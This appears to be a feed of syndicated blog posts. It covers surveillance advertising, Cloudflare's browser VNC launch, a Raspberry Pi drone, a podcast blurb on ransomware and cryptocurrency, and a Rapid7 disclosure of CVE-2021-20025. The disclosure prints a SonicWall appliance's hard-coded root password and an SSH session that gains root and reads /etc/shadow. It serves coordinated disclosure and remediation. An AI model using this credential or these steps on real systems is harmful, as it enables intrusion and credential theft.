A ban on surveillance-based practices should be complemented by stronger enforcement of existing legislation, including the General Data Protection Regulation, competition regulation, and the Unfair Commercial Practices Directive. However, enforcement currently consumes significant time and resources, and usually happens after the damage has already been done. Banning surveillance-based advertising in general will force structural changes to the advertising industry and alleviate a number of significant harms to consumers and to society at large.

A ban on surveillance-based advertising does not mean that one can no longer finance digital content using advertising. To illustrate this, we describe some possible ways forward for advertising-funded digital content, and point to alternative advertising technologies that may contribute to a safer and healthier digital economy for both consumers and businesses.

Press release. Press coverage.

I signed their open letter.

Browser VNC with Zero Trust Rules

Post Syndicated from Kenny Johnson original https://blog.cloudflare.com/browser-vnc-with-zero-trust-rules/


Starting today, we’re excited to share that you can now shift another traditional client-driven use case to a browser. Teams can now provide their users with a Virtual Network Computing (VNC) client fully rendered in the browser with built-in Zero Trust controls.

Like the SSH flow, this allows users to connect from any browser on any device, with no client software needed. The feature runs in every one of our data centers in over 200 cities around the world, bringing the experience closer to your end users. We also built the experience using Cloudflare Workers, to offer nearly instant start times. In the future we will support full auditability of user actions in their VNC and SSH sessions.

A quick refresher on VNC

VNC is a desktop sharing platform built on top of the Remote Frame Buffer protocol that allows for a GUI on any server. It is built to be platform-independent and provides an easy way for administrators to make interfaces available to users that are less comfortable with a command-line to work with a remote machine. Or to complete work better suited for a visual interface.

In my case, the most frequent reason I use VNC is to play games that have compatibility issues. Using a virtual machine to run a Windows Server was much cheaper than buying a new laptop.

In most business use cases, VNC isn't used to play games; it's driven by security or IT management requirements. VNC can be beneficial for creating a "clean room" style environment in which users interact with secure information that cannot be moved to their personal machines.

How VNC is traditionally deployed

Typically, VNC deployments require software to be installed onto a user’s machine. This software allows a user to establish a VNC connection and render the VNC server’s GUI. This comes with challenges of operating system compatibility (remember how VNC was supposed to be platform independent?), security, and management overhead.

Managing software like a VNC viewer typically requires Mobile Device Management (MDM) software or users making individual changes to their machines. This is further complicated by contractors and external users requiring access via VNC.

Challenges with VNC deployments

VNC is often used to create an environment for a user to interact with sensitive data. However, without significant network configuration, it can be very difficult to monitor when a user makes a connection to a VNC server and what they do during their session.

On top of the security concerns, software installed on a user’s machine, like a VNC viewer, is generally difficult to manage — think compatibility issues with operating systems, security updates, and many other problems.

Unlike SSH, where the majority of servers and clients predominantly use OpenSSH, there are numerous commercial and free VNC servers and clients of varying quality and cost.

We wanted to fix this!

It was time for Browser VNC

One major challenge of rendering a GUI is latency — if a user's mouse or keystrokes are slow, the experience is almost unusable. Using Cloudflare Tunnel, we can deliver the VNC connection at our edge, meaning we're less than 50 ms away from 99% of Internet users.

To do this we built a full VNC viewer implementation that runs in a web browser. Something like this would normally require running a server-side TCP → WebSocket proxy (e.g., websockify, since TCP connections are not natively supported in browsers today). Since we already have exactly this with cloudflared + Cloudflare Tunnel, we can connect to existing TCP tunnels and provide an entirely in-browser VNC experience. Because the server-side proxy happens at the TCP level, the VNC session is end-to-end encrypted between the web client and the VNC server within your network.
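As a rough illustration of the origin side, an existing VNC server listening on localhost:5900 can be exposed through a named Cloudflare Tunnel roughly as follows; the tunnel name, hostname, and config layout are placeholders and may differ from your setup:

# Authenticate cloudflared and create a named tunnel for the VNC origin
cloudflared tunnel login
cloudflared tunnel create vnc-tunnel
cloudflared tunnel route dns vnc-tunnel vnc.example.com

# ~/.cloudflared/config.yml maps the hostname to the local VNC port, e.g.:
#   tunnel: vnc-tunnel
#   credentials-file: /root/.cloudflared/<TUNNEL-UUID>.json
#   ingress:
#     - hostname: vnc.example.com
#       service: tcp://localhost:5900
#     - service: http_status:404

# Run the tunnel; the browser-rendered VNC client connects through Cloudflare's edge
cloudflared tunnel run vnc-tunnel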


Once we establish a connection, we use noVNC to render any VNC server natively in the browser.

All of this is delivered using Cloudflare Workers. We were able to build this entire experience on our serverless platform to render the VNC experience at our edge.

The final step is to authenticate the traffic going to the Tunnel established with your VNC server. For this, we can use Cloudflare Access, as it allows us to verify a user’s identity and enforce additional security checks. Once a user is properly authenticated, they are presented with a cookie that is then checked on every request made to the VNC server.


And then a user can use their VNC terminal!


Why Browser Based is the future

First and foremost, a browser-based experience is straightforward for users. All they need is an Internet connection and a URL to access their SSH and VNC instances. Previously, they needed software like a PuTTY client and RealVNC.

Legacy applications, including VNC servers, serve as another attack vector for malicious users because they are difficult to monitor and keep patched with security updates. VNC in the browser means that we can push security updates instantly, as well as take advantage of the built-in security features of modern browsers (e.g., Chromium sandboxing).

Visibility is another major improvement. In future releases, we will support screen recording and network request logging to provide detailed information on exactly what was completed during a VNC session. We already provide clear logs on any time a user accesses their VNC or SSH server via the browser.


We’re just getting started!

Browser VNC is available now in every Cloudflare for Teams plan. You can get started for up to 50 users at no cost here.

Soon we’ll be announcing our plans to support additional protocols only available in on-prem deployments. Let us know in the Community if there are particular protocols you would like us to consider!

If you have questions about getting started, feel free to post in the community. If you would like to get started today, follow our step-by-step tutorial.

‘Epigone drone’ pays homage to NASA’s Mars Helicopter | The MagPi #107

Post Syndicated from Rosie Hattersley original https://www.raspberrypi.org/blog/epigone-drone-pays-homage-to-nasas-mars-helicopter-the-magpi-107/

Inspired by NASA’s attempt to launch a helicopter on Mars, one maker made an Earth-bound one of her own. And she tells Rosie Hattersley all about it in the latest issue of The MagPi Magazine, out now.

Epigone drone hero
To avoid being swiped by the drone's rotors, the Raspberry Pi 4, which uses NASA's specially written F Prime code for telemetry, had to be positioned very carefully

Like millions of us, in April Avra Saslow watched with bated breath as NASA’s Perseverance rover touched down on the surface of Mars. 

Like most of us, Avra knew all about the other ground-breaking feat being trialled alongside Perseverance: a helicopter launch called Ingenuity, which was to be the first flight on another planet – "a fairly lofty goal", says Avra, since "the atmosphere on Mars is 60 times less dense than Earth's."

With experience of Raspberry Pi-based creations, Avra was keen to emulate Ingenuity back here on earth.

Project maker holding their creation
Avra’s videographer colleague lent her the drone that enables Epigone to achieve lift-off

NASA chose to use open-source products and use commercially available parts for its helicopter build. It just so happened that Avra had recently begun working at SparkFun, a Colorado-based reseller that sells the very same Garmin LIDAR-Lite v3 laser altimeter that NASA’s helicopter is based on. “It’s a compact optical distance measurement sensor that gives the helicopter ‘eyes’ to see how far it hovers above ground,” Avra explains.

NASA posted the Ingenuity helicopter’s open-source autonomous space-flight software, written specifically for use with Raspberry Pi, on GitHub. Avra took all this as a sign she “just had to experiment with the same technology they sent to Mars.”

F Prime and shine

Her plan was to see whether she could get GPS and lidar working within NASA's framework, "and then take the sensors up on a drone and see how it all performed in the air." Helpfully, NASA's GitHub post included a detailed F Prime tutorial based around Raspberry Pi. Avra says understanding and using F Prime (F´) was the hardest part of her Epigone drone project. "It's a beast to take on from an electronics enthusiast standpoint," she says. Even so, she emphatically encourages others to explore it and take the opportunity to make use of NASA's code.

epigone drone front view
NASA recognises that Raspberry Pi offers a way to “dip your toe in embedded systems,” says Avra, and “encourages the idea that Linux can run on two planets in the solar system”

Raspberry Pi 4 brain

The Epigone Drone is built around Raspberry Pi 4 Model B; Garmin’s LIDAR-Lite v4, which connects to a Qwiic breakout board and has a laser rather than an LED; a battery pack; and a DJI Mini 2 drone borrowed from a videographer colleague. Having seen how small the drone was, Avra realised 3D-printing an enclosure case would make everything far too heavy. As it was, positioning the Epigone onto its host drone was challenging enough: the drone’s rotors passed worryingly close to the project’s Raspberry Pi, even when precisely positioned in the centre of the drone’s back. The drone has its own sensors to allow for controlled navigation, which meant Avra’s design had to diverge from NASA’s and have its lidar ‘eyes’ on its side rather than underneath.

Although her version piggybacks on an existing drone, Avra was amazed when her Epigone creation took flight:

“I honestly thought [it] would be too heavy to achieve lift, but what do ya know, it flew! It went up maybe 30 ft and we were able to check the sensors by moving it close and far from the SparkFun HQ [where she works].”

While the drone’s battery depleted in “a matter of minutes” due to its additional load, the Epigone worked well and could be deployed to map small areas of land such as elevation changes in a garden, Avra suggests.

The MagPi #107 out NOW!

MagPi 107 cover

You can grab the brand-new issue right now from the Raspberry Pi Press store, or via our app on Android or iOS. You can also pick it up from supermarkets and newsagents. There’s also a free PDF you can download.

The post ‘Epigone drone’ pays homage to NASA’s Mars Helicopter | The MagPi #107 appeared first on Raspberry Pi.

CVE-2021-20025: SonicWall Email Security Appliance Backdoor Credential

Post Syndicated from Tod Beardsley original https://blog.rapid7.com/2021/06/23/cve-2021-20025-sonicwall-email-security-appliance-backdoor-credential/


The virtual, on-premises version of the SonicWall Email Security Appliance ships with an undocumented, static credential, which can be used by an attacker to gain root privileges on the device. This is an instance of CWE-798: Use of Hard-coded Credentials, and has an estimated CVSSv3 score of 9.1. This issue was fixed by the vendor in version 10.0.10, according to the vendor’s advisory, SNWLID-2021-0012.

Product Description

The SonicWall Email Security Virtual Appliance is a solution which “defends against advanced email-borne threats such as ransomware, zero-day threats, spear phishing and business email compromise (BEC).” It is in use in many industries around the world as a primary means of preventing several varieties of email attacks. More about SonicWall’s solutions can be found at the vendor’s website.

Credit

This issue was discovered by William Vu of Rapid7, and is being disclosed in accordance with Rapid7’s vulnerability disclosure policy.

Exploitation

The session capture detailed below illustrates using the built-in SSH management interface to connect to the device as the root user with the password, “sonicall”.

This attack was tested on 10.0.9.6105 and 10.0.9.6177, the latest builds available at the time of testing.

wvu@kharak:~$ ssh -o stricthostkeychecking=no -o userknownhostsfile=/dev/null root@192.168.123.251
Warning: Permanently added '192.168.123.251' (ECDSA) to the list of known hosts.
For CLI access you must login as snwlcli user.
root@192.168.123.251's password: sonicall
[root@snwl ~]# id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)
[root@snwl ~]# uname -a
Linux snwl.example.com 4.19.58-snwl-VMWare64 #1 SMP Wed Apr 14 20:59:36 PDT 2021 x86_64 GNU/Linux
[root@snwl ~]# grep root /etc/shadow
root:Y0OoRLtjUwq1E:12605:0:::::
[root@snwl ~]# snwlcli
Login: admin
Password:
SNWLCLI> version
10.0.9.6177
SNWLCLI>

Impact

Given remote root access to what is usually a perimeter-homed device, an attacker can further extend their reach into a targeted network to launch additional attacks against internal infrastructure from across the internet. More locally, an attacker could likely use this access to update or disable email scanning rules and logic, allowing malicious email to pass undetected and further exploit internal hosts.

Remediation

As detailed in the vendor’s advisory, users are urged to use at least version 10.0.10 on fresh installs of the affected virtual host. Note that updating to version 10.0.10 or later does not appear to resolve the issue directly; users who update existing versions should ensure they are also connected to the MySonicWall Licensing services in order to completely resolve the issue.

For sites that are not able to update or replace affected devices immediately, access to remote management services should be limited to only trusted, internal networks — most notably, not the internet.
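As a rough illustration only (this is upstream network filtering, not configuration on the appliance itself), a Linux-based firewall in front of the appliance could drop management SSH traffic that doesn't originate from a trusted internal range; the appliance IP and subnet below are placeholders:

# Drop SSH (22/tcp) to the appliance unless it comes from the trusted 10.0.0.0/8 range
iptables -A FORWARD -p tcp -d 203.0.113.10 --dport 22 ! -s 10.0.0.0/8 -j DROP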

Disclosure Timeline

Rapid7’s coordinated vulnerability disclosure team is deeply impressed with this vendor’s rapid turnaround time from report to fix. This vulnerability was both reported and confirmed on the same day, and thanks to SonicWall’s excellent PSIRT team, a fix was developed, tested, and released almost exactly three weeks after the initial report.

  • April, 2021: Issue discovered by William Vu of Rapid7
  • Thu, Apr 22, 2021: Details provided to SonicWall via their CVD portal
  • Thu, Apr 22, 2021: Confirmed reproduction of the issue by the vendor
  • Thu, May 13, 2021: Update released by the vendor, removing the static account
  • Thu, May 13, 2021: CVE-2021-20025 published in SNWLID-2021-0012
  • Wed, Jun 23, 2021: Rapid7 advisory published with further details

Don Spies and Kim Grauer on tracking illicit Bitcoin transactions

Post Syndicated from Rapid7 original https://blog.rapid7.com/2021/06/23/don-spies-and-kim-grauer-on-tracking-illicit-bitcoin-transactions/


In this episode of Security Nation, we’re joined by Don Spies and Kim Grauer of Chainalysis. They discuss the relationship between ransomware and cryptocurrency and how Chainalysis leverages unique characteristics of the latter to combat the former.

Stick around for our Rapid Rundown, where Tod and Jen discuss a newly discovered, very old crypto vulnerability (and by crypto we mean encryption!), as well as take a look at election security news here in the wake of literally hundreds of audits of polling results.

Kim Grauer


Kim Grauer is the Director of Research at Chainalysis, where she examines trends in cryptocurrency economics and crime. She was trained in economics at the London School of Economics and in politics at Oxford University. Previously, she explored technological advancements in developing countries as an academic research associate at the London School of Economics and was an economics researcher at the New York City Economic Development Corporation.

Don Spies


Don Spies is the Director of Strategic Initiatives for Chainalysis, where he works with federal agencies to address their cryptocurrency needs. This includes fighting terrorism, enforcing sanctions, and detecting money laundering. Previously, Don held various roles at the U.S. Department of the Treasury. He also spent 13 years as an Intelligence Officer in the U.S. Army Reserve.

Want More Inspiring Stories From the Security Community?

Subscribe to Security Nation Today
